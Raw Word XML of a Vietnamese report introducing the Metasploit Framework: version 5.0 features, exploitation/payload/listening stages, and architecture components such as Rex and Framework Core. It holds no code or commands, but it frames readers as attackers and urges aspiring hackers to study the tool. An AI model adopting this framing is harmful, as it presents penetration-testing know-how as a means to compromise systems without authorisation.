    <w:p w14:paraId="41BA70AD" w14:textId="264CA0F4" w:rsidR="006C2B15" w:rsidRPr="00C73388" w:rsidRDefault="006C2B15" w:rsidP="00D4645D">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framework là một framework mã nguồn mở phát triển nhằm sử dụng các shellcode (payload) để tấn công máy có lỗ hổng. Cùng với một số bộ công cụ bảo mật khác, Metasploit có cơ sở dữ liệu chứa hàng ngàn shellcode, hàng ngàn exploit của các hệ điều hành,</w:t>
      </w:r>
      <w:r w:rsidR="00E35730" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C62E9" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">các chương trình hay dịch </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>vụ.</w:t>
      </w:r>
      <w:r w:rsidR="001C62E9"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Trong quá trình phát triển metasploit liên tục cập nhật các Exploit...Nên càng ngày nó càng trở thành một bộ công cụ mạnh mẽ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E895660" w14:textId="77777777" w:rsidR="006C2B15" w:rsidRPr="00C73388" w:rsidRDefault="006C2B15" w:rsidP="006C2B15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15C36882" w14:textId="587B1D9A" w:rsidR="006C2B15" w:rsidRDefault="006C2B15" w:rsidP="00D4645D">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asploit framework là một bộ dự án sinh ra để kiểm tra độ an toàn (pentesting) nhưng đối với những attacker như chúng ta,</w:t>
      </w:r>
      <w:r w:rsidR="002829DF"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thì nó thực sự l</w:t>
      </w:r>
      <w:r w:rsidR="002829DF" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">à một công cụ vô cùng hữu ích (dùng để kiểm tra, </w:t>
      </w:r>
      <w:r w:rsidR="000249D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>khai thác lỗi</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="000249D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E42323">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00863F82">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Thực sự theo mình nghĩ thì ai muốn làm hacker</w:t>
      </w:r>
      <w:r w:rsidR="00E42323">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (hay script kidie đi chăng nữa</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>) thì cũng nên bỏ thời gian ra nghiên cứu kĩ về nó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D0961C" w14:textId="77777777" w:rsidR="00D4645D" w:rsidRDefault="00D4645D" w:rsidP="006C2B15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23EC4373" w14:textId="77777777" w:rsidR="00D4645D" w:rsidRP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Metasploit 5.0 cung cấp dịch vụ dữ liệu mới, giới thiệu các khả năng trốn tránh mới, hỗ trợ nhiều ngôn ngữ và xây dựng dựa trên kho lưu trữ nội dung tấn công ngày càng phát triển của Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E4559D" w14:textId="77777777" w:rsidR="00D4645D" w:rsidRPr="00D4645D" w:rsidRDefault="00D4645D" w:rsidP="00D4645D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07B542C7" w14:textId="545A4F00" w:rsidR="00D4645D" w:rsidRP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Metasploit 5.0 mang đến nhiều tính năng mới, cũng như nhịp phát hành mới. API cơ sở dữ liệu và tự động hóa mới của Metasploit, các mô-đun và thư viện trốn tránh, hỗ trợ ngôn ngữ mở rộng, hiệu suất được cải thiện và dễ sử dụng là nền tảng cho khả năng làm việc nhóm tốt hơn, tích hợp công cụ và khai thác theo quy mô.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCF7E7F" w14:textId="77777777" w:rsidR="00D4645D" w:rsidRDefault="00D4645D" w:rsidP="00D4645D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27959442" w14:textId="37DEF9E5" w:rsid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 xml:space="preserve">Metasploit 5.0 là bước đầu tiên trong việc hiện đại hóa cách Metasploit tương tác với dữ liệu và các công cụ khác. Ngoài phần cuối của cơ sở dữ liệu Postgresql hiện có từ 4.x, Metasploit 5.0 thêm khả năng tự chạy cơ sở dữ liệu dưới dạng dịch vụ RESTful, với nhiều bảng điều khiển Metasploit và thậm chí các công cụ bên ngoài có thể tương tác. Thay đổi cũng giảm tải một số hoạt động hàng loạt cho dịch vụ cơ sở dữ liệu, giúp cải thiện hiệu suất bằng cách cho phép xử lý song song cơ sở </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00259971" w14:textId="77777777" w:rsidR="00D4645D" w:rsidRDefault="00D4645D" w:rsidP="00D4645D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D7C2FF6" w14:textId="302AC0B8" w:rsidR="00D4645D" w:rsidRPr="00D4645D" w:rsidRDefault="00D4645D" w:rsidP="00D4645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API JSON-RPC mới của Metasploit sẽ là sự bổ sung đáng hoan nghênh cho người dùng muốn tích hợp Metasploit với các công cụ và ngôn ngữ mới. Metasploit từ lâu đã hỗ trợ tự động hóa thông qua giao thức mạng duy nhất của riêng mình, nhưng độc đáo cũng có nghĩa là khó kiểm tra hoặc gỡ lỗi hơn bằng các công cụ tiêu chuẩn như 'curl'. Metasploit 5.0 cũng bổ sung một khung dịch vụ web phổ biến để hiển thị cả cơ sở dữ liệu và API tự động hóa; khung này hỗ trợ xác thực nâng cao và các hoạt động đồng thời và mở đường cho các dịch vụ trong tương lai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66349C6F" w14:textId="77777777" w:rsidR="00D4645D" w:rsidRPr="00D4645D" w:rsidRDefault="00D4645D" w:rsidP="00D4645D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="241BA42A" w14:textId="7203ED97" w:rsidR="00D4645D" w:rsidRPr="00C73388" w:rsidRDefault="00D4645D" w:rsidP="006C2B15">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645D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Để tương thích ngược, Metasploit 5.0 vẫn hỗ trợ chạy chỉ với cơ sở dữ liệu cục bộ hoặc hoàn toàn không có cơ sở dữ liệu. Nó vẫn hỗ trợ giao thức RPC gốc MessagePack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B06502E" w14:textId="77777777" w:rsidR="00E13179" w:rsidRPr="00C73388" w:rsidRDefault="00E13179" w:rsidP="00CA2D0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="352E7A32" w14:textId="0A133694" w:rsidR="00FC5CF9" w:rsidRPr="00C73388" w:rsidRDefault="00FC5CF9"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 Các giai đoạn của Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A1B666" w14:textId="77777777" w:rsidR="00E20705" w:rsidRPr="00C73388" w:rsidRDefault="00E20705" w:rsidP="00E20705">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1. Giai đoạn 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">System exploitation/Khai thác hệ thống </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBFDABB" w14:textId="0793CB73" w:rsidR="00E20705" w:rsidRPr="00C73388" w:rsidRDefault="00E20705" w:rsidP="00E20705">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System exploitation/Khai thác hệ thống - thuật ngữ gốc đằng sau meta 'sploit' - tức là khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21373B36" w14:textId="77777777" w:rsidR="00E20705" w:rsidRPr="00C73388" w:rsidRDefault="00E20705" w:rsidP="00E20705">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BCEA59C" w14:textId="5EE74315" w:rsidR="008A024F" w:rsidRPr="00C73388" w:rsidRDefault="00E20705" w:rsidP="00E20705">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Thuật ngữ này chỉ ra rằng bạn đang cố gắng khai thác một lỗ hổng hệ thống, máy tính hoặc mạng. Về cơ bản là bạn đang cố gắng tìm kiếm trong một mạng và sau đó tìm ra máy tính có lỗ hổng (backdoor) có thể bị xâm phạm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DD75B4" w14:textId="77777777" w:rsidR="00E20705" w:rsidRPr="00C73388" w:rsidRDefault="00E20705" w:rsidP="00CA2D0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="562825B4" w14:textId="091EF363"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2: Giai đoạn 2. Payload/Tải trọng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036BDED5" w14:textId="0ADA15F3"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ột tính năng quan trọng của Metasploit là metasploit không chỉ quét mà còn thu thập thông tin về các hệ thống có thể được khai thác, và sau đó chạy mã code bên trong hệ thống bị xâm phạm. Tóm lại, đây là quá trình đưa code vào mà code đó nằm trong payload. Khi một payload được giải phóng, hacker hoặc penetration tester có thể chạy các lệnh và tác vụ sau đó. Mục tiêu là cần tạo ra một payload đủ lớn để có thể tạo mã shell. Shell là một giao diện dòng lệnh cung cấp cho người dùng quyền kiểm soát hoàn toàn đối với một máy bị xâm phạm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B88AF2A" w14:textId="77777777" w:rsidR="007C788F" w:rsidRPr="00C73388" w:rsidRDefault="007C788F" w:rsidP="00CA2D0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75B4DEAF" w14:textId="712E96A8"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Vì Metasploit là một framework nên user có thể tự tạo code và script riêng. Tuy nhiên, nếu bạn không rành về code thì cũng không cần quá lo lắng bởi đã có nhiều mô-đun được tạo ra để hỗ trợ bạn. Tất cả các module Metasploit đều rất cụ thể, qua đó chúng giúp thực hiện các tác vụ cụ thể. Ví dụ, các tác vụ như chạy quét mạng, mã độc ARP, packet sniffing vv… có thể đều đã có các module metasploit riêng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2356A923" w14:textId="77777777" w:rsidR="007C788F" w:rsidRPr="00C73388" w:rsidRDefault="007C788F" w:rsidP="00CA2D0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="736338A5"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2.3. Giai đoạn 3. Listening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4080F705"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4EA3722A" w14:textId="2E915601" w:rsidR="007C788F" w:rsidRPr="00C73388" w:rsidRDefault="007C788F" w:rsidP="006C2B15">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Khả năng listening của metasploit được đánh giá rất cao. Trên thực tế, metasploit cũng giống như Wireshark lắng nghe rất tố các kết nối đến. Thế nhưng trong thế giới của các hacker, mọi thứ thường không xảy ra nhanh chóng, một hacker chuyên nghiệp có thể dành hàng tháng trời để xây dựng chiến lược và lên kế hoạch tấn công tốt nhất có thể. Bởi trong các cuộc tấn công, nghiên cứu đóng vai trò quan trọng nhất. PunkSPIDER và SHODAN là hai ví dụ về các dịch vụ mà một penetration tester có thể sử dụng trước khi dùng đến Metasploit. Cả PunkSPIDER và SHODAN đều hoạt động gần giống với một công cụ tìm kiếm. Sự khác biệt duy nhất là các công cụ này tìm kiếm các thông tin và lỗ hổng server. Metasploit có thể được triển khai để mở bất kỳ "cánh cửa khép hờ" nào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189D4061"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58420E4A" w14:textId="63064AC9" w:rsidR="003C1E1D" w:rsidRPr="00C73388" w:rsidRDefault="00FC5CF9"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3</w:t>
      </w:r>
      <w:r w:rsidR="00CA2D0B" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="002829DF" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Kiến trúc của Metasploit Framework</w:t>
      </w:r>
      <w:r w:rsidR="002829DF" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B593B1" w14:textId="65CF1417" w:rsidR="003C1E1D" w:rsidRPr="00C73388" w:rsidRDefault="003C1E1D" w:rsidP="00E75BF8">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F90142" w:rsidRPr="00F90142">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E53B0E3" wp14:editId="25E5392C">
            <wp:extent cx="5727700" cy="4691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691380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60689F80" w14:textId="42E72C7D" w:rsidR="002829DF" w:rsidRDefault="002829DF" w:rsidP="002829DF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Kiến trúc của Metasploit Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D2AA85" w14:textId="77777777" w:rsidR="00C73388" w:rsidRPr="00C73388" w:rsidRDefault="00C73388" w:rsidP="002829DF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39105705" w14:textId="1EB4FE2D" w:rsidR="002829DF" w:rsidRPr="00C73388" w:rsidRDefault="00295981" w:rsidP="002829DF">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3.1. </w:t>
      </w:r>
      <w:r w:rsidR="002829DF" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Các thành phần chính trong kiến trúc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E8BB0B" w14:textId="4ADD1680" w:rsidR="002829DF" w:rsidRPr="00C73388" w:rsidRDefault="00295981" w:rsidP="002829DF">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3.1.1. </w:t>
      </w:r>
      <w:r w:rsidR="002829DF" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Rex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A868762" w14:textId="45E27FB1" w:rsidR="002829DF" w:rsidRPr="00C73388" w:rsidRDefault="002829DF" w:rsidP="002829D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 xml:space="preserve">Là thành phần cơ bản nhất của toàn bộ kiến trúc Framework. Rex là viết tắt của Ruby Extension Library, là một tập hợp các lớp, modum có thể được sử dụng bởi các nhà phát triển để phát triển các dự án </w:t>
      </w:r>
      <w:r w:rsidR="004E71D0" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hoặc các công cụ</w:t>
      </w:r>
      <w:r w:rsidR="00295981" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho MSF (Metasploit Framework).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615646AF" w14:textId="77777777" w:rsidR="00295981" w:rsidRPr="00C73388" w:rsidRDefault="00295981" w:rsidP="002829DF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22151CD9" w14:textId="77777777" w:rsidR="00EC5E48" w:rsidRPr="00C73388" w:rsidRDefault="00295981" w:rsidP="002829D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III.3.1.2. Framework Core (khung lõi) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D497428" w14:textId="170EBF32" w:rsidR="00295981" w:rsidRPr="00C73388" w:rsidRDefault="00EC5E48" w:rsidP="002829D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B</w:t>
      </w:r>
      <w:r w:rsidR="00295981" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">ao gồm một tập các hệ thống </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>con như các modun quản lý, quản lý</w:t>
      </w:r>
      <w:r w:rsidR="00295981" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> phiên</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, sự kiện điều phối… Lõi cũng như cung cấp cho ta một giao diện tới các modun, tiện ích bổ sung của Framework. Khung lõi bao gồm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC99098" w14:textId="6C693066" w:rsidR="00EC5E48" w:rsidRPr="00C73388" w:rsidRDefault="00EC5E48" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
